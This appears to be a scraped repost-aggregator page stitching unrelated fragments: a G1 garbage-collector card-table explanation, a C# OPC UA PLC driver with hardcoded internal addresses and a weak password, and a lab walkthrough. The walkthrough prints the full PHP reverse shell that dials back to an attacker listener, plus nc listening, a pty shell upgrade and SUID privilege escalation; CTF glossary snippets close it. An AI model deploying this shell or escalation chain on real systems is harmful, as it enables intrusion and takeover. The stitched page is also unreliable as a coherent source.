Another example: suppose two objects B and C both lie within one such 512-byte region. For convenience, when reference relationships are recorded the object's start address is used and aligned to 512, so the card-table pointers of both B and C point to the same card-table slot. References can then be handled in two ways:

- Process at heap-region granularity: traverse the whole heap region, stepping by object size, together with the card table; if the corresponding card position is set, the object references objects in other regions. The details are covered later when Refine is introduced.
- Use an additional data structure to find the actual object position directly, without traversing from the beginning. The concurrent-marking discussion later uses this method to find the start position of the first object.

Besides the card table at 512-byte granularity, G1 also has bitmaps; a bitmap can, for example, describe how one region references another. Bitmaps are used very widely in the JVM; they can also describe how memory is allocated, for example.
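To make the 512-byte card granularity just described concrete, here is a small Java sketch of the address-to-card mapping; the 9-bit shift (2^9 = 512) follows the card size in the text, while HEAP_BASE and the object offsets are invented values for illustration, not JVM internals:

public class CardTableDemo {
    static final int CARD_SHIFT = 9;                 // one card byte covers 2^9 = 512 heap bytes
    static final long HEAP_BASE = 0x70000000L;       // hypothetical heap start address

    // Mirrors the idea of byte_for(): card index = (address - heap base) >> card shift.
    static long cardIndexFor(long addr) {
        return (addr - HEAP_BASE) >>> CARD_SHIFT;
    }

    public static void main(String[] args) {
        long b = HEAP_BASE + 520;                    // hypothetical object B
        long c = HEAP_BASE + 900;                    // hypothetical object C in the same 512-byte region
        System.out.println(cardIndexFor(b) == cardIndexFor(c)); // true: one card byte stands for both
        // Overhead check from the text: 1 MB / 512 bytes per card = 2048 card bytes = 2 KB.
        System.out.println((1 << 20) >> CARD_SHIFT); // 2048
    }
}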
G1 uses concurrent marking in its mixed collection algorithm. During concurrent marking a bitmap is used to describe how objects are allocated. For example, a 1 MB region can be described with 16 KB (16 KB × ObjectAlignmentInBytes × 8 = 1 MB), that is, 16 KB of additional space. Here ObjectAlignmentInBytes is 8 bytes and refers to object alignment, and the second 8 is the number of bits in a byte, so every bit describes 64 bits. For example, for an object whose aligned length is 24 bytes, in theory 3 bits would be needed to record that these 24 bytes are in use; in practice this is unnecessary: during marking only the first of those 3 bits is set, and combined with the object-size information in the heap region the object can be located exactly. The main purpose is efficiency; marking one bit saves quite some time compared with marking three, and the larger the object, the more worthwhile this is. These are implementation details of the source code that deserve careful consideration when you read it.

This article is reposted content. Original link: https://blog.csdn.net/qq_16500963/article/details/132133125.
2023-12-16 20:37:50
246
Repost
Reposted Article
...bject> readResult = null; //设备标签数据缓存private int stepLen = 250; //标签变量的步长设置private string groupNamePrefix = "DB"; //数据块号前缀private string childTagFlag = "~"; //子元素标签标志符private System.Threading.Thread innerReadThread = null; //内部读取线程对象private int innerReadRate = 1000; //内部读取频率endregionregion 属性定义/// <summary>/// OPCUA Server Url/// </summary>public string OpcUaServerUrl{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).OpcUaServerUrl;return "opc.tcp://192.168.1.102:4840";//return "opc.tcp://192.168.100.1:4840";//return "opc.tcp://192.168.100.2:4840";} }/// <summary>/// 要连接的OPCUA服务器上的服务名/// </summary>public string OpcUaServiceName{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).OpcUaServiceName;return "[UaServer@cMT-9F1F] [None] [None] [opc.tcp://192.168.1.102:4840/G01]";//return "[UaServer@cMT-EAB9] [None] [None] [opc.tcp://192.168.100.1:4840/G01]";//return "[UaServer@cMT-EA5B] [None] [None] [opc.tcp://192.168.100.2:4840/G02]";//return "[UaServer@cMT-EA5B] [None] [None] [opc.tcp://192.168.100.2:4840/G01]";} }/// <summary>/// 要连接的OPCUA服务器上指定服务名下的PLC的名称/// </summary>public string PLCName{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).PLCName;//return "Feeding";return "Siemens_192.168.2.1";//return "Rockwell_192.168.1.10";} }/// <summary>/// OPCUA服务器的访问账户/// </summary>public string Account{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).Account;return "user1";} }/// <summary>/// OPCUA服务器的访问密码/// </summary>public string Password{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).Password;return "1";} }endregionregion BaseEquip成员实现/// <summary>/// 打开连接设备/// </summary>/// <returns>成功返回true,失败返回false</returns>public override bool Open(){lock (this){this._isClosing = false;if (this._isOpen == true && this.myOpcHelper != null){return true;}this.State = false;this.myOpcHelper = new OPCUAClass();this.dicTags = this.myOpcHelper.ConnectOPCUA(this.OpcUaServerUrl, this.Account, this.Password, this.OpcUaServiceName, this.PLCName); //连接OPCServerif (this.dicTags == null || this.dicTags.Count == 0){this.myOpcHelper = null;Console.WriteLine("OPC连接失败!");this.State = false;return false;}else{this.State = true;this._isOpen = true;region 初始化读取结果this.readResult = new Dictionary<string, object>();foreach (Equips.BaseInfo.Group group in this.Group.Values){if (!group.IsAutoRead){continue;}int groupMinStart = group.Start;int groupMaxEnd = group.Start + group.Len;int groupMaxLen = group.Len;foreach (Equips.BaseInfo.Group g in this.Group.Values){if (!g.IsAutoRead){continue;}if (g.Block == group.Block){if (g.Start < group.Start){groupMinStart = g.Start;}if (g.Start + g.Len > groupMaxEnd){groupMaxEnd = g.Start + g.Len;} }}groupMaxLen = groupMaxEnd - groupMinStart;int tagCount = groupMaxLen % this.stepLen == 0 ? groupMaxLen / this.stepLen : groupMaxLen / this.stepLen + 1;int currLen = 0;for (int i = 0; i < tagCount; i++){string tagName = String.Empty;if (tagCount == 1){tagName = String.Format("{0}-{1}", groupMinStart, groupMinStart + groupMaxLen - 1);currLen = groupMaxLen;}else if (i == tagCount - 1){tagName = String.Format("{0}-{1}", groupMinStart + (i this.stepLen), groupMinStart + (i this.stepLen) + (groupMaxLen % this.stepLen == 0 ? 
this.stepLen : groupMaxLen % this.stepLen) - 1);currLen = groupMaxLen % this.stepLen;}else{tagName = String.Format("{0}-{1}", groupMinStart + (i this.stepLen), groupMinStart + (i this.stepLen) + this.stepLen - 1);currLen = this.stepLen;}string tagFullName = String.Format("{0}{1}.{2}", groupNamePrefix, group.Block, tagName);if (!this.readResult.ContainsKey(tagFullName)){bool exists = false;region 判断读取结果标签组的范围是否包括了此标签 比如tagFullName DB5.220-299,在readResult中存在 DB5.200-299,则认为已存在,不需要再添加string[] beginend = null;int begin = 0;int end = 0;string[] startstop = tagFullName.Replace(String.Format("{0}{1}.", groupNamePrefix, group.Block), String.Empty).Split(new char[] { '-' });int start = 0;int stop = 0;bool parseResult = false;if (startstop.Length == 2){parseResult = int.TryParse(startstop[0], out start);if (parseResult){parseResult = int.TryParse(startstop[1], out stop);} }if (parseResult){int existsMinBegin = 0; //已存在标签的最小开始索引int existsMaxEnd = 0; //已存在标签的最大结束索引bool isContinue = true; //标签值是否连续string[] existsTags = this.readResult.Keys.ToArray<string>();foreach (string tag in existsTags){if (tag.StartsWith(String.Format("{0}{1}.", groupNamePrefix, group.Block)) && tag.Contains(".") && tag.Contains("-")){string[] tagname = tag.Split(new char[] { '.' });if (tagname.Length == 2){beginend = tagname[1].Split(new char[] { '-' });if (beginend.Length == 2){parseResult = int.TryParse(beginend[0], out begin);if (parseResult){parseResult = int.TryParse(beginend[1], out end);}region 计算最小开始索引和最大结束索引if (begin < existsMinBegin){existsMinBegin = begin;region 判断标签值是否连续if (existsMaxEnd != 0 && begin != existsMaxEnd + 1){isContinue = false;}endregion}if (end > existsMaxEnd){existsMaxEnd = end;}endregion} }if (parseResult){if (start >= begin && stop <= end){exists = true;break;}if (isContinue){if (start >= existsMinBegin && stop <= existsMaxEnd){exists = true;break;} }} }} }endregionif (!exists){ushort[] groupData = new ushort[currLen];this.readResult[tagFullName] = groupData;Console.WriteLine(tagFullName);} }}//int tagCount = group.Len % this.stepLen == 0 ? group.Len / this.stepLen : group.Len / this.stepLen + 1;//int currLen = 0;//for (int i = 0; i < tagCount; i++)//{// string tagName = String.Empty;// if (tagCount == 1)// {// tagName = String.Format("{0}-{1}", group.Start, group.Start + group.Len - 1);// currLen = group.Len;// }// else if (i == tagCount - 1)// {// tagName = String.Format("{0}-{1}", group.Start + (i this.stepLen), group.Start + (i this.stepLen) + (group.Len % this.stepLen == 0 ? 
this.stepLen : group.Len % this.stepLen) - 1);// currLen = group.Len % this.stepLen;// }// else// {// tagName = String.Format("{0}-{1}", group.Start + (i this.stepLen), group.Start + (i this.stepLen) + this.stepLen - 1);// currLen = this.stepLen;// }// string tagFullName = String.Format("{0}{1}.{2}", groupNamePrefix, group.Block, tagName);// if (!this.readResult.ContainsKey(tagFullName))// {// short[] groupData = new short[currLen];// this.readResult[tagFullName] = groupData;// }//} }endregionregion 开启内部定时读取if (this.innerReadThread == null){this.innerReadRate = this.Main.ReadHz / 2;this.innerReadThread = new System.Threading.Thread(this.InnerAutoRead);this.innerReadThread.Start();}endregion}return this.State;} }/// <summary>/// 从设备读取数据/// </summary>/// <param name="block">要读取的块号</param>/// <param name="start">要读取的起始字</param>/// <param name="len">要读取的长度</param>/// <param name="buff">读取成功后的输出数据</param>/// <returns>成功返回true,失败返回false</returns>public override bool Read(string block, int start, int len, out object[] buff){lock (this){buff = null;if (this._isClosing){return false;}string readstrflag = String.Format("{0}{1}.{2}-{3}", this.groupNamePrefix, block, start, start + len - 1);System.Text.StringBuilder sbtaglength = new System.Text.StringBuilder();string startTag = String.Empty;string groupName = String.Format("{0}{1}", this.groupNamePrefix, block); //要读取的OPCServer块List<ushort> groupData = new List<ushort>();List<string> groupTagNames = new List<string>();int startIndex = 0;try{if (!Open()){return false;}//return true;string[] keys = this.readResult.Keys.ToArray<string>();foreach (string key in keys){if (key.StartsWith(groupName) && key.Replace(String.Format("{0}.", groupName), String.Empty).Contains("-")){groupTagNames.Add(key);} }groupTagNames.Sort(); //对块标签进行排序foreach (string key in groupTagNames){if (String.IsNullOrEmpty(startTag)){startTag = key.Replace(String.Format("{0}.", groupName), String.Empty);}ushort[] values;if (this.readResult[key] is ushort[]){values = this.readResult[key] as ushort[];}else{values = new ushort[] { (ushort)this.readResult[key] };}sbtaglength.Append(String.Format("tagName={0}, buff length = {1}", key, values.Length));groupData.AddRange(values);}buff = new object[len];if (!String.IsNullOrEmpty(startTag)){string strStartIndex = startTag.Substring(0, startTag.IndexOf("-"));int.TryParse(strStartIndex, out startIndex);startIndex = start - startIndex;Array.Copy(groupData.ToArray(), startIndex, buff, 0, buff.Length);}else{}return true;}catch (Exception ex){Console.WriteLine(String.Join(";", groupTagNames.ToArray<string>()));Console.WriteLine("data length = " + groupData.Count);Console.WriteLine(this.Name + "读取失败[" + readstrflag + "]:" + ex.Message);Console.WriteLine(sbtaglength.ToString());this.State = false;return false;} }}/// <summary>/// 写入数据到设备/// </summary>/// <param name="block">要写入的块号</param>/// <param name="start">要写入的起始字</param>/// <param name="buff">要写如的数据</param>/// <returns>成功返回true,失败返回false</returns>public override bool Write(int block, int start, object[] buff){bool result = true;lock (this){try{if (this._isClosing){return false;}if (!Open()){return false;}bool isWrite = false;region 按标签变量写入string itemId = "";foreach (Equips.BaseInfo.Group group in this.Group.Values){if (group.Block == block.ToString()){foreach (Equips.BaseInfo.Data data in group.Data.Values){if (group.Start + data.Start == start && data.Len == buff.Length){if (this.dicTags.ContainsKey(data.Name)){itemId = this.dicTags[data.Name];}break;} }} }if 
(!String.IsNullOrEmpty(itemId)){UInt16[] intBuff = new UInt16[buff.Length];for (int i = 0; i < intBuff.Length; i++){intBuff[i] = 0;if (!UInt16.TryParse(buff[i].ToString(), out intBuff[i])){Console.WriteLine("在写入OPCUA标签时把buff中的元素转为UInt16类型失败!");} }result = this.myOpcHelper.WriteUInt16(itemId, intBuff);if (!result){Console.WriteLine(String.Format("标签变量[{0}]写入失败!", itemId));return false;}else{Console.WriteLine("按标签变量写入..." + itemId);isWrite = true;} }if (isWrite){return true;}endregionregion 按块写入region 先读取相应标签数数据string startTag = String.Empty;string groupName = String.Format("{0}{1}", this.groupNamePrefix, block); //要读取的OPCServer块List<ushort> groupData = new List<ushort>();string[] keys = readResult.Keys.Where(o => o.StartsWith(groupName) && o.Contains("-")).OrderBy(c => c).ToArray<string>();foreach (string key in keys){if (String.IsNullOrEmpty(startTag)){startTag = key.Replace(String.Format("{0}.", groupName), String.Empty);}string[] beginEnd = key.Replace(String.Format("{0}.", groupName), String.Empty).Split(new char[] { '-' });if (beginEnd.Length != 2){Console.WriteLine(String.Format("标签变量[{0}]未按约定方式命名,请按[DB块号].[起始字-结束字]方式标签变量进行命名!", String.Format("{0}.{1}", key)));return false;}int begin = 0;int end = 0;int.TryParse(beginEnd[0], out begin);int.TryParse(beginEnd[1], out end);region 写入之前,先读取一下PLC的值if ((start >= begin && start <= end) || ((start + buff.Length - 1) >= begin && (start + buff.Length - 1) <= end) || (start < begin && (start + buff.Length - 1) > end)){this.ReadTag(key);if (this.readResult.ContainsKey(key) && this.readResult[key] is Array){Console.WriteLine("read = " + key);groupData.AddRange(this.readResult[key] as ushort[]);}else{Console.WriteLine(String.Format("读取结果中不包含标签变量[{0}]的值!", String.Format("{0}", key)));} }else{if (this.readResult.ContainsKey(key) && this.readResult[key] is Array){Console.WriteLine("no read = " + key);groupData.AddRange(this.readResult[key] as ushort[]);} }endregion}endregionif (String.IsNullOrEmpty(startTag)){Console.WriteLine("写入失败,未在OPCUAserver中找到对应的标签,block = {0}, start = {1}, len = {2}", block, start, buff.Length);return false;}region 更新标签中对应的数据后,再写回OPCServerint startIndex = 0;string strStartIndex = startTag.Substring(0, startTag.IndexOf("-"));int.TryParse(strStartIndex, out startIndex);startIndex = start - startIndex;ushort[] newDataBuffer = groupData.ToArray();for (int i = 0; i < buff.Length; i++){ushort svalue = 0;ushort.TryParse(buff[i].ToString(), out svalue);newDataBuffer[startIndex + i] = svalue;}int index = 0;string[] keys2 = readResult.Keys.Where(o => o.StartsWith(groupName) && o.Contains("-")).OrderBy(c => c).ToArray<string>();foreach (string key2 in keys2){string[] beginEnd = key2.Replace(String.Format("{0}.", groupName), String.Empty).Split(new char[] { '-' });if (beginEnd.Length != 2){Console.WriteLine(String.Format("标签变量[{0}]未按约定方式命名,请按[DB块号].[起始字-结束字]方式标签变量进行命名!", String.Format("{0}", key2)));return false;}int begin = 0;int end = 0;int.TryParse(beginEnd[0], out begin);int.TryParse(beginEnd[1], out end);if ((start >= begin && start <= end) || ((start + buff.Length - 1) >= begin && (start + buff.Length - 1) <= end) || (start < begin && (start + buff.Length - 1) > end)){//Console.WriteLine("---------------------------------------------------------");//Console.WriteLine("start = " + start);//Console.WriteLine("start + buff.Length - 1 = " + (start + buff.Length -1));//Console.WriteLine("begin = " + begin);//Console.WriteLine("end = " + end);//Console.WriteLine("---------------------------------------------------------");if 
(!this.dicTags.ContainsKey(key2)){Console.WriteLine(String.Format("写入失败:标签变量[{0}]在OpcUA Server中未定义!", String.Format("{0}", key2)));return false;}int len = (this.readResult[key2] as ushort[]).Length;ushort[] tagDataBuff = new ushort[len];//Console.WriteLine("newDataBuff");//Console.WriteLine(String.Join(",", newDataBuffer));//Console.WriteLine("index = " + index);//Console.WriteLine("tagDataBuff.Length = " + tagDataBuff.Length);//Array.Copy(newDataBuffer, begin, tagDataBuff, 0, tagDataBuff.Length);int existsMinBegin = this.GetExistsMinBeginByBlock(block.ToString());Array.Copy(newDataBuffer, begin - existsMinBegin, tagDataBuff, 0, tagDataBuff.Length);index += tagDataBuff.Length;//Console.WriteLine("Write " + key2);//Console.WriteLine(String.Join(",", tagDataBuff));//Console.WriteLine("写入标签:" + this.dicTags[key2]);result = this.myOpcHelper.WriteUInt16(this.dicTags[key2], tagDataBuff);if (!result){Console.WriteLine(String.Format("向标签变量[{0}]中写入值失败!", String.Format("{0}", key2)));return false;}else{this.ReadTag(key2);Console.WriteLine("写入...");}//Console.WriteLine("---------------------------------------------------------");} }endregionendregionreturn result;}catch (Exception ex){Console.WriteLine(this.Name + "写入失败:" + ex.Message);return false;} }}/// <summary>/// 关闭方法,断开与设备的连接释放资源/// </summary>public override void Close(){try{this._isClosing = true;System.Threading.Thread.Sleep(this.Main.ReadHz);if (this.innerReadThread != null){this.innerReadThread.Abort();this.innerReadThread = null;} }catch (Exception ex){Console.WriteLine("关闭内部读取OPCUA线程异常:" + ex.Message);}try{if (this.myOpcHelper != null){this.myOpcHelper.Close();this.myOpcHelper = null;this.State = false;this._isOpen = false;} }catch (Exception ex){Console.WriteLine("关于与OPCUA服务连接异常:" + ex.Message);} }endregionregion 辅助方法/// <summary>/// 获取某个数据块标签的最小开始索引/// </summary>/// <param name="block">块号</param>/// <returns>返回数据块标签的最小开始索引</returns>private int GetExistsMinBeginByBlock(string block){int existsMinBegin = 99999; //已存在标签的最小开始索引int existsMaxEnd = 0; //已存在标签的最大结束索引bool isContinue = true; //标签值是否连续string[] existsTags = this.readResult.Keys.ToArray<string>();string[] beginend = null;bool parseResult = false;int begin = 0;int end = 0;foreach (string tag in existsTags){if (tag.StartsWith(String.Format("{0}{1}.", groupNamePrefix, block)) && tag.Contains(".") && tag.Contains("-")){string[] tagname = tag.Split(new char[] { '.' 
});if (tagname.Length == 2){beginend = tagname[1].Split(new char[] { '-' });if (beginend.Length == 2){parseResult = int.TryParse(beginend[0], out begin);if (parseResult){parseResult = int.TryParse(beginend[1], out end);}region 计算最小开始索引和最大结束索引if (begin < existsMinBegin){existsMinBegin = begin;region 判断标签值是否连续if (existsMaxEnd != 0 && begin != existsMaxEnd + 1){isContinue = false;}endregion}if (end > existsMaxEnd){existsMaxEnd = end;}endregion} }if (parseResult){//} }}return existsMinBegin;}/// <summary>/// 读取标签/// </summary>/// <param name="tagName"></param>private void ReadTag(string tagName){UInt16[] buff = null;if (this.dicTags.ContainsKey(tagName)){if (this.myOpcHelper.ReadUInt16(this.dicTags[tagName], out buff)){//Console.WriteLine("tagName={0}, buff length = {1}", tagName, buff.Length);if (this.readResult.ContainsKey(tagName)){this.readResult[tagName] = buff;}else{this.readResult.Add(tagName, buff);} }else{Console.WriteLine("Mesnac.Equip.OPC.OpcUa.OPCUA.Equip.ReadTag Exception 读取标签:[{0}]失败!", tagName);} }else{Console.WriteLine("Mesnac.Equip.OPC.OpcUa.OPCUA.Equip.ReadTag Exception OPCUA Server中未定义此标签:[{0}]!", tagName);} }/// <summary>/// 内部自动读取方法/// </summary>private void InnerAutoRead(){while (this._isOpen && this._isClosing == false){try{if (this.myOpcHelper == null){this._isClosing = true;this.State = false;return;}lock (this){string[] keys = this.readResult.Keys.ToArray<string>();foreach (string key in keys){this.ReadTag(key);} }System.Threading.Thread.Sleep(this.innerReadRate);}catch (Exception ex){Console.WriteLine("Mesnac.Equip.OPC.OpcUa.OPCUA.Equip.InnerAutoRead Exception : " + ex.Message);} }this.innerReadThread = null;}endregionregion 析构方法~Equip(){this.Close();}endregion} } 代码下载 代码下载 本篇文章为转载内容。原文链接:https://blog.csdn.net/zlbdmm/article/details/96714776。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-05-10 18:43:00
269
转载
转载文章
... in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. 
This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听:nc -lvp 6666 访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了,换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 
2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询:touchmenot 没找到 尝试运行程序:发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这? 总结 本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具:sqlmap 抓包工具:burpsuite Webshell 后门:kali 内置后门 Suid 提权:touchmenot 提权 本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
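上文用 find / -perm -u=s -type f 2>/dev/null 枚举 SUID 程序,其原理是检查文件权限位中的 setuid 位。下面是一个思路等价的 Python 小示意(实际渗透中一行 find 命令更方便,这里只为说明原理):

#!/usr/bin/env python3
# 极简示意:枚举带 SUID 位的普通文件,
# 思路等价于 find / -perm -u=s -type f 2>/dev/null
import os
import stat

def find_suid(root="/"):
    for dirpath, _, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # 无权限等错误,相当于 2>/dev/null
            # 必须是普通文件且设置了 setuid 位
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path

for p in find_suid("/usr/bin"):
    print(p)

找到可疑的 SUID 程序后,再像上文那样到 GTFOBins 查询或直接试运行。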
2023-01-02 12:50:54
497
转载
转载文章
...常规的SELECT、UPDATE或DELETE等SQL语句。在该文描述的GYCTF2020比赛中,由于存在严格的过滤规则,参赛者无法直接用常规SQL查询获取数据,因此他们借助handler语句逐行读取表内容,成功破解了题目并得到了flag。 CVE-2020-7066,这是一个公开的安全漏洞编号,对应PHP 7.2.x、7.3.x以及7.4.x版本中get_headers()函数存在的安全问题。在特定条件下,当get_headers()函数处理包含零字节(\\0)的URL时,URL会被错误地截断,可能导致信息泄露。在GKCTF2020比赛的签到题目中,选手需要根据这个CVE提示,研究如何构造特定URL,并利用get_headers()函数的这一漏洞,实现信息泄露,进而完成签到或获取flag的操作。
2023-11-13 21:30:33
303
转载
转载文章
